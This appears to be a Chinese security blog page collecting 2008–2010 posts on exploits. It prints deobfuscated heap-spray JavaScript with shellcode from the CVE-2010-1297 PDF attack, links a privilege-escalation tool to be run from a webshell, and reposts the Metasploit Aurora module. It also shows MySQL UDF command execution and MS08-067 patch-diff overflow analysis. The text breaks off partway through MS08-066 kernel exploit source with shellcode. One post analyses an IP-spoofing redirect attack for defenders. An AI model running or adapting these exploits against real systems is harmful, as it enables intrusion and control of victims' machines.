Friddy's罐子 - 漏洞公告

CVE-2010-1297那个Adobe洞的内幕

2010-06-09T08:31:21+08:00

Adobe近日发布了一个安全公告，称Flash Player、Adobe Reader和Acrobat中存在一个严重安全漏洞，该漏洞(CVE-2010-1297)可导致应用程序崩溃或使攻击者控制受影响系统，Adobe表示已经接到有黑客利用该漏洞进行攻击的报告。目前Adobe尚未提供官方修补方案，但Flash Player 10.1 Release Candidate不受此漏洞影响，用户可下载使用或采取以下临时解决方案，以避免受到漏洞威胁。

================================================================

pdf样本（解压密码friddy）：

点击下载此文件

=======================================================================

解出里面的javascript，看起来此次“并非国人所为”：

各位看客请仔细看！~~！特别注意“第四行”

var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
c = unescape(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e65789000006aff6a57ff9044"));
b += c;
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();

扩展阅读：

http://blogs.adobe.com/asset/2009/12/fuzzing_reader_-_lessons_learned.html

360本地提权webshell下测试程序

2010-02-02T14:40:47+08:00

测试方法：
在webshell下运行360test.exe

成功后，3389到服务器，按5下shift，得到一个cmd

PS:由于需要本地权限，对个人用户不会造成影响，危害也不是大范围的。

测试程序：

点击下载此文件

密码：friddy

Aurora 确定了

2010-01-17T23:05:18+08:00

##看到HDM的这个可以确定了，世界又要开始新的一轮疯狂了
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpServer::HTML
        include Msf::Exploit::Remote::BrowserAutopwn
        autopwn_info({
                :ua_name    => HttpClients::IE,
                :ua_minver  => "6.0",
                :ua_maxver  => "8.0",
                :javascript => true,
                :os_name    => OperatingSystems::WINDOWS,
                :vuln_test  => nil, # no way to test without just trying it
        })

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
                        'Description'    => %q{
                                This module exploits a memory corruption flaw in Internet Explorer. This
                        flaw was found in the wild.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'unknown',
                                        'hdm'      # Metasploit port
                                ],
                        'Version'        => '$Revision: 8136 $',
                        'References'     =>
                                [
                                        ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                                        ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "\x00",
                                        'Compat'   =>
                                                {
                                                        'ConnectionType' => '-find',
                                                },
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Automatic', { }],
                                ],
                        'DisclosureDate' => 'Jan 14 2009', # wepawet sample
                        'DefaultTarget'  => 0))
        end

        def on_request_uri(cli, request)

                if (request.uri.match(/\.gif/i))
                        data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
                        send_response(cli, data, { 'Content-Type' => 'image/gif' })
                        return
                end

                var_memory    = rand_text_alpha(rand(100) + 1)
                var_boom      = rand_text_alpha(rand(100) + 1)
                var_x1        = rand_text_alpha(rand(100) + 1)
                var_e1        = rand_text_alpha(rand(100) + 1)
                var_e2        = rand_text_alpha(rand(100) + 1)

                var_comment   = rand_text_alpha(rand(100) + 1);
                var_abc       = rand_text_alpha(3);

                var_ev1       = rand_text_alpha(rand(100) + 1)
                var_ev2       = rand_text_alpha(rand(100) + 1)
                var_sp1       = rand_text_alpha(rand(100) + 1)

                var_unescape  = rand_text_alpha(rand(100) + 1)
                var_shellcode = rand_text_alpha(rand(100) + 1)
                var_spray     = rand_text_alpha(rand(100) + 1)
                var_start     = rand_text_alpha(rand(100) + 1)
                var_i         = rand_text_alpha(rand(100) + 1)

                rand_html     = rand_text_english(rand(400) + 500)

                html = %Q|

                |

                # Transmit the compressed response to the client
                send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

                # Handle the payload
                handler(cli)
        end
end

大规模网页绑架转址之水落石出篇

2009-03-13T08:58:27+08:00

山高月小，水落石出、清風徐來，水波不興！

最近的大規模轉址事件，由於影響範圍廣大，引起了各方的討論，o0o.nu的fyodor yarochkin（聯絡方式：fygrave 鼠 o0o 點 nu）與阿碼科技的Wayne，之前針對此事鍵做了一些研究，並在前一篇post「大規模網頁綁架轉址：威脅未解除，但專家都猜錯了」中，依據我們錄到的封包，詳述了我們對事件的看法。我們不覺得此事與DNS有關係，也沒有證據顯示此次與zxarps工具的ARP掛馬手法有關。從我們錄到的封包來看，這是典型的，從90年代一直用到現在的IP spoofing。

這兩天，經過一些研究與測試，我們可以在route上準確的指出攻擊程式的所在位子，昨天也已經充分通知相關單位，今天在這裡把結果與各位分享，另外也謝謝Peter Yen與其他朋友提供的寶貴資訊。

最近攻擊有轉緩的趨勢，大部分大型網站的流量已經不再被轉址，但是我們這幾天觀察下來，一直到昨天（今天尚未測試），攻擊程式都還存在，只是不再針對大型網站spoofing，而針對某些特定網站做spoofing，並且不斷更改行為，故我們認為對方正在做許多測試與校調，試圖盡量讓spoofed封包看起來與正常流量類似，以便下次發動攻擊。我們的測試方法是利用一個小程式發送TCP封包，封包裡是HTTP GET request，而再透過TTL的設計，就可以知道當封包經過哪一個節點時，有spoofed IP packet發送回來。當然我們這種測試方法是可以被偵測到的，所以現在公開之後，預計也將增加往後類似測試的困難度。

[攻擊所在位置]
我們從兩個端點進行測試，其中一個端點A是會被攻擊的，而另一個端點B是不會被攻擊的。這兩個端點的匯集處是211.22.33.225這個路由器，而我們同時在兩端點跑測試程式，對目前仍會遭受攻擊的網域送GET封包。測試結果，端點B不會收到spoofed封包，而端點A則每當封包經過第六個節點210.65.255.241（也就是連到211.22.33.225的前一個節點）時，我們就會收到spoofed封包。我們因此可以肯定，在210.65.255.241這個分支中，有攻擊程式。由於資源有限，我們只測試了A與B兩個分支。

（圖一）

（圖二）

[攻擊手法改變]
在我們貼出了「大規模網頁綁架轉址：威脅未解除，但專家都猜錯了」一篇後，立刻觀察到對方在攻擊手法上不斷調整，我們做紀錄於下：

1. id已經不像之前我們觀察到的，固定在0x0100，開始隨機了。其實我們之前沒有明講，但是相信許多網管人員一看到我們的post，就了解到了，裡頭的資訊可以直接用來設定IDS/IPS/Firewall，有效阻擋攻擊吧？像是id固定是0x0100、或FIN與payload同時存在等，可惜我們每次一公開，對方也會跟著改變。下圖錄於三月11日10:30am，第五個封包是spoofed，第六個是正牌的封包：

（圖三）

2. 已經不再是一個封包完成攻擊了。一個封包同時設FIN與帶payload，是很大的特徵，很容易被IDS/IPS/firewall抓到，故這幾天錄到的流量中，對方不斷改變方式，已經不再採此手法了。但是也並不是一次發兩個封包，一個payload一個FIN，而是還是只發一個，而讓正牌的FIN來結束連線。這樣的作法，每個攻擊仍然只有一個spoofed封包（payload），比較俐落，但是由於沒有立刻結束連線（不帶FIN），故根據各作業系統TCP/IP stack實做之不同，可能造成假封包與正封包內容被系統合而為一，因此payload需要特別設計，以免轉址失敗而瀏覽器出現亂碼。我們測試時，對方正不斷調整payload的設計。上圖中，第五個封包的FIN沒有設了，第六個是正牌repy，第七個則是正牌網站送出的FIN。

3. 開始轉向確定有惡意程式的網址。之前雖然轉址網域過去都有許多不良紀錄，但是就這次攻擊事件的範圍，之前沒有看到確實具有攻擊力的惡意程式存在於這些網址中。然而如上圖又下方所示，最新的攻擊中，所轉址的其中一個網址：hxxp://61.218.245.190/_vti_access/index.htm，確定含有四支具有攻擊性，可觸發之攻擊程式（以下為免費網站惡意程式監控服務HackAlert畫面）：

（圖四）

4. 開始想辦法隱藏攻擊。見下圖，錄於三月11日10:30am。下圖中，第51封包是spoofed，我們看右下角的payload，這會讓瀏覽器載入一個隱形的iframe（目前是google），而過了四秒後，瀏覽器會reload。由於沒有轉向，這會讓受害者只覺得等了比較久，但是正確網頁最後還是會載入，故不容易發現蹊蹺，而到時候把iframe改成指向惡意網頁而非google，這四秒足夠惡意程式攻擊受害者電腦成功，植入木馬了。

（圖五）

5. 同一個被感染的網段，可能有不只一個的攻擊程式。圖五中，第51封包是spoofed，id=0x0100，ttl=115，payload是隱藏的google iframe，並在四秒後重新載入原網站的內容。第54個封包也是spoofed，id=0xccbb，ttl=113，內容是直接轉向到惡意網址。正牌的回應封包則是第56與58。這很可能是兩組不同人馬所植入之不同攻擊程式，也有可能是同一組人在測試不同版本時忘記把其中一個版本關閉。

（圖六）

6. 攻擊之工具是否是zxarps的改版延伸？這我們一開始就測試過了，然zarpx可實際做man-in-the-middle竄改封包而這次並沒有，另外封包特徵差異非常大（ttl/id/service filed/行為等），故我們覺得應該使用了其他的攻擊程式。

[結論]
針對我們錄到的資料，我們可以做出以下結論：
1. 至少可以測出攻擊程式仍位於210.65.255.241這個節點。另外可以確定並非網站本身受感染。
2. 對方目前不斷測試不同攻擊方式並使得此攻擊完美化，明顯為下一波攻擊鋪路。
3. 在初次很粗糙的測試中，對方可以造成大量轉址，但行為明顯，使用者很容易察覺。在新一波觀察到的手法中，對方一直致力調整成使用者無法察覺之方式。
4. 對方針對我們公布的特徵進行改良，欲使IDS/IPS/firewall無法輕易認出假造的封包。
5. 在小量的測試中，已經含有具有攻擊性並能攻擊成功的惡意網頁。
6. 由於是基礎架構問題，一般使用者無能為力，只能盡量使用https，等待基礎架構修復。
7. 有問題的網段可以檢查路由器與路由器相通的他機器是否遭侵入或竄改設定。

作者 Fyodor Yarochkin 為 o0o.nu 成員
作者 Wayne 為阿碼科技CEO

Command execution with a MySQL UDF

2009-02-03T13:05:37+08:00

Modern database management systems are powerful applications: they provide several instruments to interact with the underlying operating system.

On MySQL it is possible to create a User-Defined Function to execute commands on the underlying operating system. Marco Ivaldi demonstrated that some years ago. His raptor_udf2.c works well, but it has two limitations:

It is not MySQL 5.0+ compliant because it does not follow the new guidelines to create a proper UDF.
It calls C function system() to execute the command and returns always integer 0.
These limitations make the UDF almost useless on recent MySQL server installations if the database administrator wants to get the exit status of the command as UDF output or the command standard output itself.

I recently came across an open repository of MySQL User-Defined Functions maintained by Roland Bouman and other developers. One of their codes kept my attention: lib_mysqludf_sys (version 0.0.2) which implements three different functions to interact with the underlying environement:

sys_exec: executes an arbitrary command, and can thus be used to launch an external application.
sys_get: gets the value of an environment variable.
sys_set: create an environment variable, or update the value of an existing environment variable.
The first function can be used to execute operating system commands and has two advantages over raptor's UDF:

It is MySQL 5.0+ compliant and it compiles on both Linux as a shared object and on Windows as a dynamic-link library.
It returns the exit status of the executed command.
However, none of these two functions return the command standard output so I took some time to patch this last source code adding a sys_eval() UDF to return the standard output of the command if it success, NULL otherwise.

The patched source code can be found on sqlmap subversion repository here and a single patch file for the original lib_mysqludf_sys version 0.0.2 is available here.

Usage example:

$ wget --no-check-certificate https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
$ tar xfz lib_mysqludf_sys_0.0.3.tar.gz
$ cd lib_mysqludf_sys_0.0.3
$ sudo ./install.sh
Compiling the MySQL UDF
gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o /usr/lib/lib_mysqludf_sys.so
MySQL UDF compiled successfully

Please provide your MySQL root password
Enter password:
MySQL UDF installed successfully
$ mysql -u root -p mysql
Enter password:
[...]
mysql> Select sys_eval('id');
+--------------------------------------------------+
| sys_eval('id') |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+--------------------------------------------------+
1 row in set (0.02 sec)

mysql> Select sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
| 0 |
+-----------------------------------+
1 row in set (0.02 sec)

mysql> exit
Bye
$ ls -l /tmp/test_mysql
-rw-rw---- 1 mysql mysql 0 2009-01-16 23:18 /tmp/test_mysql 点击下载此文件

关于MS08067的效率问题

2008-10-29T17:15:37+08:00

这些天，对MS08067的测试来看，总结如下:

中文版，打成功过2ksp4的，不知道我的Xp的虚拟机怎么这么不争气！！！！！
韩文版，打成功过3台2ksp4和一台XP的
日文版，打成功过2k和XP、2003的
英文、台湾版,也是全部成功

对失败，分析一下，有2个原因：
1.这个漏洞对shellcode长度有限制，正如我上周五逆向出来的结果
2.由于用了绑定端口，对过部分杀软和防火墙效果不好。

注：本人纯属研究，后面尽力写这个漏洞的检测规则！

MS08067补丁前后比较分析结果

2008-10-24T12:37:42+08:00

MS08-067： Server 服务中的漏洞可能允许远程代码执行
http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx
这条更新为重要，可以说与当年的冲击波类似。上午我对补丁前后分析，定位到微软修改过的函数结果如下：

发生缓冲区溢出的函数：
signed int __stdcall sub_5FDDA180(int a1, wchar_t *a2, int a3, int a4, int a5)
{
  wchar_t *v5; // ebx@1
  size_t v6; // edi@1
  int v7; // esi@1
  int v8; // edi@3
  signed int result; // eax@4
  wchar_t *v10; // eax@5
  unsigned int v11; // eax@10
  size_t v12; // eax@14
  __int16 v13; // ax@16
  size_t v14; // eax@3
  int v15; // [sp+428h] [bp-4h]@1
  wchar_t *v16; // [sp+10h] [bp-41Ch]@1
  int v17; // [sp+Ch] [bp-420h]@1
  wchar_t v18; // [sp+14h] [bp-418h]@2

  v5 = a2;
  v15 = dword_5FE1E18C;
  v7 = a1;
  v16 = (wchar_t *)a3;
  v6 = 0;
  v17 = a5;
  if ( a1 && *(_WORD *)a1 )
  {
    v12 = wcslen((const wchar_t *)a1);
    v6 = v12;
    if ( v12 )
    {
      if ( v12 > 0x208 )
        return 123;
      wcscpy(&v18, (const wchar_t *)v7);
      v13 = LOWORD((&v16)[v6 + 1]);
      if ( v13 != '\' )
      {
        if ( v13 != '/' )
        {
          wcscat(&v18, &word_5FDECBD4);
          ++v6;
        }
      }
      if ( *v5 == '\' || *v5 == '/' )
        ++v5;
    }
  }
  else
  {
    v18 = 0;
  }
  v14 = wcslen(v5);
  v8 = v14 + v6;
  if ( v8 < v14 )
    return 123;
  if ( (unsigned int)v8 > 0x207 )//wchar_t *a2这个参数的长度不能超过 0x207(unicode)
    return 123;
  wcscat(&v18, v5);
  v10 = &v18;
  if ( v18 )
  {
    do
    {
      if ( *v10 == '/' )
        *v10 = '\';
      ++v10;
    }
    while ( *v10 );
  }
  if ( !sub_5FDD9F7A(&v18) && !sub_5FDDA26B((int)&v18) )//这个函数修改过了
    return 123;
  v11 = 2 * wcslen(&v18) + 2;
  if ( v11 > a4 )
  {
    if ( v17 )
      *(_DWORD *)v17 = v11;
    result = 2123;
  }
  else
  {
    wcscpy(v16, &v18);//缓冲区溢出点
    result = 0;
  }
  return result;
}

被修改的函数：
//----- (5FDDA26B) --------------------------------------------------------
signed int __stdcall sub_5FDDA26B(int a1)
{
  wchar_t v1; // ax@1
  int v2; // ecx@1
  int v3; // ebx@1
  int v4; // edi@1
  int v5; // esi@3
  int v6; // eax@10
  __int16 v7; // dx@10
  __int16 v8; // bx@11
  __int16 v10; // dx@17
  int v11; // ecx@18
  __int16 v12; // ax@19
  int v13; // eax@34
  wchar_t *v14; // ecx@41
  char v15; // zf@1
  int v16; // [sp+Ch] [bp-4h]@1

  v2 = a1;
  v1 = *(_WORD *)a1;
  v3 = 0;
  v4 = 0;
  v15 = *(_WORD *)a1 == '\';
  v16 = 0;
  if ( v15 || v1 == '/' )
  {
    v10 = *(_WORD *)(a1 + 2);
    if ( v10 == '\' || v10 == '/' )
    {
      v11 = a1 + 4;
      while ( 1 )
      {
        v12 = *(_WORD *)v11;
        if ( *(_WORD *)v11 == '\' )
          break;
        if ( v12 == '/' )
          break;
        if ( !v12 )
          return 0;
        v11 += 2;
      }
      if ( !*(_WORD *)v11 || (v2 = v11 + 2, v1 = *(_WORD *)v2, a1 = v2, v1 == '\') || v1 == '/' )
        return 0;
    }
  }
  v5 = v2;
  if ( !v1 )
    return 1;
  while ( 1 )
  {
    if ( v1 == '\' )
    {
      if ( v3 == v5 - 2 )
        return 0;
      v4 = v3;
      v16 = v5;
      goto LABEL_6;
    }
    if ( v1 != 46 || v3 != v5 - 2 && v5 != v2 )
      goto LABEL_6;
    v6 = v5 + 2;
    v7 = *(_WORD *)(v5 + 2);
    if ( v7 == 46 )
    {
      v8 = *(_WORD *)(v5 + 4);
      if ( v8 == '\' || !v8 )
      {
        if ( !v4 )
          return 0;
        wcscpy((wchar_t *)v4, (const wchar_t *)(v5 + 4)); //可能会发生缓冲区溢出
        if ( !v8 )
          return 1;
        v16 = v4;
        v5 = v4;
        v13 = v4 - 2;
        while ( *(_WORD *)v13 != '\' && v13 != a1 )
          v13 -= 2;
        v2 = a1;
        v4 = v13 & -(*(_WORD *)v13 == '\');
      }
      goto LABEL_6;
    }
    if ( v7 != '\' )
      break;
    if ( v3 )
    {
      v14 = (wchar_t *)v3;
    }
    else
    {
      v6 = v5 + 4;
      v14 = (wchar_t *)v5;
    }
   wcscpy(v14, (const wchar_t *)v6);//可能会发生缓冲区溢出
    v2 = a1;
LABEL_7:
    v1 = *(_WORD *)v5;
    if ( !*(_WORD *)v5 )
      return 1;
    v3 = v16;
  }
  if ( v7 )
  {
LABEL_6:
    v5 += 2;
    goto LABEL_7;
  }
  if ( v3 )
    v5 = v3;
  *(_WORD *)v5 = 0;
  return 1;
}

MS08066本地权限提升漏洞exploit

2008-10-16T22:54:09+08:00

#Thanks to SoBeIt
#Original URL:http://www.whitecell.org/forums/viewthread.php?tid=796
#include
#include
#include

#pragma comment(lib, "ws2_32.lib")

#define NTSTATUS        int

typedef struct _PROCESS_BASIC_INFORMATION {
        NTSTATUS ExitStatus;
        PVOID PebBaseAddress;
        ULONG AffinityMask;
        ULONG BasePriority;
        ULONG UniqueProcessId;
        ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;

typedef struct _IMAGE_FIXUP_ENTRY {
        USHORT        Offset:12;
  USHORT        Type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

typedef enum _PROCESS_IMFORMATION_CLASS {
        ProcessBasicInformation,
        ProcessQuotaLimits,
        ProcessIoCounters,
        ProcessVmCounters,
        ProcessTimes,
        ProcessBasePriority,
        ProcessRaisePriority,
        ProcessDebugPort,
        ProcessExceptionPort,
        ProcessAccessToken,
        ProcessLdtInformation,
        ProcessLdtSize,
        ProcessDeaultHardErrorMode,
        ProcessIoPortHandlers,
        ProcessPooledUsageAndLimits,
        ProcessWorkingSetWatch,
        ProcessUserModeIOPL,
        ProcessEnableAlignmentFaultFixup,
        ProcessPriorityClass,
        ProcessWx86Information,
        ProcessHandleCount,
        ProcessAffinityMask,
        ProcessPriorityBoost,
        ProcessDeviceMap,
        ProcessSessionInformation,
        ProcessForegroundInformation,
        ProcessWow64Information
} PROCESS_INFORMATION_CLASS;

typedef enum _SYSTEM_INFORMATION_CLASS {
        SystemBasicInformation,
        SystemProcessorInformation,
        SystemPerformanceInformation,
        SystemTimeOfDayInformation,
        SystemNotImplemented1,
        SystemProcessesAndThreadsInformation,
        SystemCallCounts,
        SystemConfigurationInformation,
        SystemProcessorTimes,
        SystemGlobalFlag,
        SystemNotImplemented2,
        SystemModuleInformation,
        SystemLockInformation,
        SystemNotImplemented3,
        SystemNotImplemented4,
        SystemNotImplemented5,
        SystemHandleInformation,
        SystemObjectInformation,
        SystemPagefileInformation,
        SystemInstructioEmulationCounts,
        SystemInvalidInfoClass1,
        SystemCacheInformation,
        SystemPoolTagInformation,
        SystemProcessorStatistics,
        SystemDpcInformation,
        SystemNotImplemented6,
        SystemLoadImage,
        SystemUnloadImage,
        SystemTimeAdjustment,
        SystemNotImplemented7,
        SystemNotImplemented8,
        SystemNotImplemented9,
        SystemCrashDumpInformation,
        SystemExceptionInformation,
        SystemCrashDumpStateInformation,
        SystemKernelDebuggerInformation,
        SystemContextSwitchInformation,
        SystemRegisterQuotaInformation,
        SystemLoadAndCallImage,
        SystemPrioritySeparation
} SYSTEM_INFORMATION_CLASS;

typedef enum _KPROFILE_SOURCE {
        ProfileTime,
  ProfileAlignmentFixup,
  ProfileTotalIssues,
  ProfilePipelineDry,
  ProfileLoadInstructions,
  ProfilePipelineFrozen,
  ProfileBranchInstructions,
  ProfileTotalNonissues,
  ProfileDcacheMisses,
  ProfileIcacheMisses,
  ProfileCacheMisses,
  ProfileBranchMispredictions,
  ProfileStoreInstructions,
  ProfileFpInstructions,
  ProfileIntegerInstructions,
  Profile2Issue,
  Profile3Issue,
  Profile4Issue,
  ProfileSpecialInstructions,
  ProfileTotalCycles,
  ProfileIcacheIssues,
  ProfileDcacheAccesses,
  ProfileMemoryBarrierCycles,
  ProfileLoadLinkedIssues,
  ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

typedef struct _UNICODE_STRING {
        USHORT        Length;
        USHORT        MaximumLength;
        PWSTR        Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _SECTION_BASIC_INFORMATION {
        PVOID BaseAddress;
        ULONG Attributes;
        LARGE_INTEGER Size;
}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;

typedef struct _SYSTEM_MODULE_INFORMATION {
        ULONG Reserved[2];
        PVOID Base;
        ULONG Size;
        ULONG Flags;
        USHORT Index;
        USHORT Unknown;
        USHORT LoadCount;
        USHORT ModuleNameOffset;
        CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef NTSTATUS (NTAPI *ZWQUERYINTERNALPROFILE)(ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG);
typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID);
typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOID, ULONG, USHORT, PULONG);

ZWQUERYINTERNALPROFILE        ZwQueryIntervalProfile;
ZWQUERYINFORMATIONPROCESS        ZwQueryInformationProcess;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory;
RTLIMAGENTHEADER RtlImageNtHeader;
RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;

unsigned char kfunctions[64][64] =
{
                                                        //ntoskrnl.exe
        {"ZwTerminateProcess"},
        {"PsLookupProcessByProcessId"},
        {""},
};

unsigned char shellcode[] =
                "\x90\x60\x9c\xe9\xc4\x00\x00\x00\x5f\x4f\x47\x66\x81\x3f\x90\xcc"
                "\x75\xf8\x66\x81\x7f\x02\xcc\x90\x75\xf0\x83\xc7\x04\x64\x8b\x35"
                "\x38\x00\x00\x00\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7\x95"
                "\x8b\xf7\x6a\x02\x59\xe8\x4d\x00\x00\x00\xe2\xf9\x8b\x4e\x0c\xe8"
                "\x29\x00\x00\x00\x50\x8b\x4e\x08\xe8\x20\x00\x00\x00\x5a\x8b\x7e"
                "\x1c\x8b\x0c\x3a\x89\x0c\x38\x56\x8b\x7e\x14\x8b\x4e\x18\x8b\x76"
                "\x10\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3\x83\xec\x04"
                "\x8d\x2c\x24\x55\x51\xff\x56\x04\x85\xc0\x0f\x85\x80\x8f\x00\x00"
                "\x8b\x45\x00\x83\xc4\x04\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78"
                "\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33"
                "\xdb\x0f\xbe\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1"
                "\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e"
                "\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x37\xff\xff"
                "\xff\x90\x90\x90"

                "\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";

void ErrorQuit(pMsg)
{
        printf("%sError Code:%d\n", pMsg, GetLastError());
        ExitProcess(0);
}

ULONG ComputeHash(char *ch)
{
        ULONG ret = 0;

        while(*ch)
        {
                ret = ((ret << 25) | (ret >> 7)) + *ch++;
        }

        return ret;
}

void GetFunction()
{
        HANDLE        hNtdll;

        hNtdll = LoadLibrary("ntdll.dll");
        if(hNtdll == NULL)
                ErrorQuit("LoadLibrary failed.\n");

        ZwQueryIntervalProfile = (ZWQUERYINTERNALPROFILE)GetProcAddress(hNtdll, "ZwQueryIntervalProfile");
        if(ZwQueryIntervalProfile == NULL)
                ErrorQuit("GetProcAddress failed.\n");

        ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
        if(ZwQueryInformationProcess == NULL)
                ErrorQuit("GetProcAddress failed.\n");

        ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
        if(ZwQuerySystemInformation == NULL)
                ErrorQuit("GetProcessAddress failed.\n");

        ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory");
        if(ZwAllocateVirtualMemory == NULL)
                ErrorQuit("GetProcAddress failed.\n");

        RtlImageNtHeader = (RTLIMAGENTHEADER)GetProcAddress(hNtdll, "RtlImageNtHeader");
        if(RtlImageNtHeader == NULL)
                ErrorQuit("GetProcAddress failed.\n");

        RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)GetProcAddress(hNtdll, "RtlImageDirectoryEntryToData");
        if(RtlImageDirectoryEntryToData == NULL)
                ErrorQuit("GetProcAddress failed.\n");

        FreeLibrary(hNtdll);
}

ULONG GetKernelBase(char *KernelName)
{
        ULONG        i, Byte, ModuleCount, KernelBase;
        PVOID        pBuffer;
        PSYSTEM_MODULE_INFORMATION        pSystemModuleInformation;
        PCHAR        pName;

        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);

